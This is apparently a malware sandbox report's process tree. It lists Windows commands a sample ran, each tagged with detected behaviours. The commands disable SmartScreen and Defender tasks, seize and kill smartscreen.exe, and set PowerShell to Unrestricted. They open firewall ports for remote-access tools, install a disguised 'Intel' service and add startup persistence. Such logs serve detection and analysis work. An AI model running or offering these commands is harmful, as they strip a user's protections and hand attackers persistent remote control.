-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f8⤵PID:5612
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f8⤵PID:3236
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f8⤵PID:3096
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f8⤵
- System Location Discovery: System Language Discovery
PID:3492
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f8⤵PID:1224
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f8⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f8⤵PID:5448
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f8⤵
- System Location Discovery: System Language Discovery
PID:5952
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f /reg:648⤵PID:3240
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f8⤵
- System Location Discovery: System Language Discovery
PID:540
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f8⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f /reg:648⤵PID:3156
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f8⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f /reg:648⤵PID:4780
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f8⤵PID:5772
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f /reg:648⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f /reg:648⤵PID:4108
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f8⤵PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable8⤵
- System Location Discovery: System Language Discovery
PID:4104
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable8⤵PID:4412
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable8⤵PID:3924
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable8⤵PID:2396
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable8⤵PID:4536
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\sc.exe config webthreatdefsvc start= disabled8⤵
- Launches sc.exe
PID:3372
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\sc.exe config webthreatdefusersvc start= disabled8⤵
- Launches sc.exe
PID:5232
-
-
C:\Windows\SysWOW64\takeown.exeC:\Windows\System32\takeown.exe /s EPFPAFGQ /u Admin /f "C:\Windows\System32\smartscreen.exe"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\SysWOW64\icacls.exeC:\Windows\System32\icacls.exe "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4940
-
-
C:\Windows\SysWOW64\taskkill.exeC:\Windows\System32\taskkill.exe /im smartscreen.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\*.*"8⤵
- Views/modifies file attributes
PID:4304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:5068
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:1984
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:1884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:1960
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:4992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:3976
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:4516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:4600
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:2468
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:4696
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:5152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:5624
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Users\Public\shell.txt"8⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:3472
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:2352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:6064
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Windows\note.exe"8⤵
- Enumerates system info in registry
PID:4384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:656
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Users\Public\shell.txt"8⤵
- Enumerates system info in registry
PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F"8⤵PID:5740
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Users\Public\shell.txt"8⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2460
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"8⤵
- Views/modifies file attributes
PID:1716
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_OK.ini"8⤵
- Views/modifies file attributes
PID:316
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_ERRO.ini"8⤵
- Views/modifies file attributes
PID:4492
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"8⤵
- Views/modifies file attributes
PID:4688
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"8⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2720
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"8⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4636
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.*"8⤵
- Views/modifies file attributes
PID:4564
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"8⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:5648
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"8⤵
- Views/modifies file attributes
PID:872
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"8⤵
- Views/modifies file attributes
PID:532
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\Windows\SysWOW64\en\*.lst"8⤵
- Views/modifies file attributes
PID:2032
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Windows\L2cache"8⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:6060
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f8⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:648⤵PID:4620
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate8⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:5660
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:4796
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:4644
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:2844
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:852
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate8⤵
- System Location Discovery: System Language Discovery
- Kills process with WMI
PID:6012
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"8⤵
- Views/modifies file attributes
PID:368
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.lst"8⤵
- Views/modifies file attributes
PID:4568
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe service where "name like 'Intel(R) Utiliti'" call stopservice8⤵PID:2444
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Intel(R) Utiliti'" Call Delete8⤵
- System Location Discovery: System Language Discovery
PID:3860
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe stop "Intel(R) Utiliti"8⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4864
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\SC.exe DELETE "Intel(R) Utiliti"8⤵
- Launches sc.exe
PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /Delete /TN * /F8⤵PID:2008
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:1160
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:736
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate8⤵
- Kills process with WMI
PID:5040
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\Users\Public\shell.txt"8⤵
- Views/modifies file attributes
PID:5556
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\shell.txt"8⤵
- Views/modifies file attributes
PID:1448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ArgumentList 'Set-ExecutionPolicy Unrestricted' -Verb RunAs -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-ExecutionPolicy Unrestricted9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2512
-
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /f8⤵PID:3096
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f /reg:648⤵PID:2756
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f8⤵PID:4604
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 443" dir=in action=allow protocol=TCP localport=4438⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1508
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 443" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4780
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 80" dir=in action=allow protocol=TCP localport=808⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3480
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 80" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4536
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 6568" dir=in action=allow protocol=TCP localport=65688⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3460
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 6568" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3688
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 50001" dir=in action=allow protocol=TCP localport=500018⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5488
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 50001" new enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:624
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk1" dir=in action=allow program="C:\Program Files (x86)\AnyDesk\AnyDesk.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4088
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk2" dir=in action=allow program="C:\Program Files\AnyDesk\AnyDesk.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4324
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk3" dir=in action=allow program="C:\ProgramData\AnyDesk\AnyDesk.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer1" dir=in action=allow program="C:\Program Files (x86)\TeamViewer\TeamViewer.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5896
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer2" dir=in action=allow program="C:\Program Files\TeamViewer\TeamViewer.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4044
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer3" dir=in action=allow program="C:\ProgramData\TeamViewer\TeamViewer.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4764
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel1" dir=in action=allow program="C:\ProgramData\IntelSvc.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3380
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel2" dir=in action=allow program="C:\Users\Public\IntelSvc.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1812
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel3" dir=in action=allow program="C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4516
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel4" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\tv_x86.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:212
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\USOShared\*.*"8⤵
- Views/modifies file attributes
PID:4616
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\ProgramData\IntelSvc.exe' -ArgumentList '-install_service' -verb runas -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
PID:872 -
C:\ProgramData\IntelSvc.exe"C:\ProgramData\IntelSvc.exe" -install_service9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3780
-
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f8⤵
- Sets service image path in registry
PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f /reg:648⤵
- Sets service image path in registry
- System Location Discovery: System Language Discovery
PID:2444
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"8⤵
- Views/modifies file attributes
PID:972
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"8⤵
- Views/modifies file attributes
PID:3860
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /create /sc minute /mo 58 /tn "OneDrv" /tr "\"C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe\"" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"8⤵PID:4004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"8⤵
- Drops startup file
PID:6124
-
-
C:\Windows\SysWOW64\tasklist.exeC:\Windows\System32\tasklist.exe8⤵
- Enumerates processes with tasklist
PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "x86" 2>NUL"8⤵PID:2988
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe /i "64"8⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe Query "HKLM\Hardware\Description\System\CentralProcessor\0"8⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:760
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe /i "x86"8⤵
- System Location Discovery: System Language Discovery
PID:4756
-
-
C:\Windows\SysWOW64\tasklist.exeC:\Windows\System32\tasklist.exe /FI "IMAGENAME eq Sophos.exe"8⤵
- Enumerates processes with tasklist
PID:1224
-
-
C:\Windows\SysWOW64\findstr.exeC:\Windows\System32\findstr.exe /i /c:"Sophos"8⤵PID:2224
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\Intxt1.ps1'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1'" -Encoding ascii}" -Wait8⤵
- Command and Scripting Interpreter: PowerShell
PID:2396
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
PID:1108
-
-
C:\Windows\SysWOW64\findstr.exeC:\Windows\System32\findstr.exe /i /b /v /c:"Name" /c:"----" "C:\Users\Admin\AppData\Local\Temp\Intxt1.txt"8⤵PID:1604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "Get-WmiObject" 2>NUL"8⤵PID:5624
-
-
C:\Windows\SysWOW64\findstr.exeC:\Windows\System32\findstr.exe /i /c:"#"8⤵PID:4720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv8⤵
- System Location Discovery: System Language Discovery
PID:2460 -
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv9⤵
- System Location Discovery: System Language Discovery
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c DIR /s "C:\Get-WmiObject*.exe" /B /O:D8⤵PID:4824
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio%'" Call Terminate8⤵
- Kills process with WMI
PID:4652
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe process where "name like '%Xmrig%'" Call Terminate8⤵
- Kills process with WMI
PID:6060
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /reg:648⤵PID:532
-
-
